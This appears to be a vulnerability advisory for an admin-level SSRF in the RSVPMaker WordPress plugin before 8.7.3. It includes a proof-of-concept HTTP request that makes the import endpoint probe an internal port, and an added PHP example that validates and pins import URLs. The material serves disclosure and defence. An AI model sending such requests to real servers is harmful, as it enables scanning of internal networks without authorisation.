wpexploit | Wpvulndb | WPEX-ID:63BE225C-EBEE-4CAC-B43E-CF033EE7425D
Jun 29, 2021 - 12:00 a.m.

RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF

The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes a URL as input and passes it to curl without first validating that it points to a remote host. As a result, a high-privilege user could use that feature to scan the internal network via an SSRF attack.

Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import'.

POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1
Host: 172.28.128.50
Content-Length: 52
Accept: */*
X-Requested-With: XMLHttpRequest
X-WP-Nonce: b56e26b3f8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen
Accept-Language: en-US,en;q=0.9
Cookie: [admin cookies]
Connection: close

importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0


Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
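
A server-side check that would reject the request above before curl runs, as an added example (not RSVPMaker's code or its actual fix). The function names are hypothetical, and the example assumes IPv4-only resolution and that only ports 80 and 443 are legitimate import targets.

```php
<?php
// Added example, not RSVPMaker code; function names are hypothetical.

/** Return host/port/ip when $url is safe to fetch server-side, else null. */
function example_validate_import_url(string $url): ?array
{
    $p = parse_url($url);
    $scheme = strtolower($p['scheme'] ?? '');
    $host = $p['host'] ?? '';
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Web schemes on their standard ports only, which rules out port probing.
    if ($host === '' || !in_array($scheme, ['http', 'https'], true) || !in_array($port, [80, 443], true)) {
        return null;
    }
    // IPv4 only in this example: gethostbynamel() returns A records.
    $ips = filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? [$host] : gethostbynamel($host);
    if (empty($ips)) {
        return null;
    }
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) { // every resolved address must be public
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    return ['host' => $host, 'port' => $port, 'ip' => $ips[0]];
}

/** Fetch a validated URL, pinned to the address that was checked. */
function example_safe_fetch(string $url)
{
    $t = example_validate_import_url($url);
    if ($t === null) {
        return false;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false, // a redirect could point back inside
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$t['host']}:{$t['port']}:{$t['ip']}"], // no second DNS lookup
    ]);
    return curl_exec($ch);
}

// Constructed sample inputs; the first is the URL sent in the request above.
foreach (['http://127.0.0.1:23', 'http://172.28.128.50/', 'http://203.0.113.10/'] as $u) {
    echo $u, ' => ', example_validate_import_url($u) ? 'allow' : 'reject', PHP_EOL;
}
```

Inside WordPress, wp_safe_remote_get() applies a comparable URL check before the request is made.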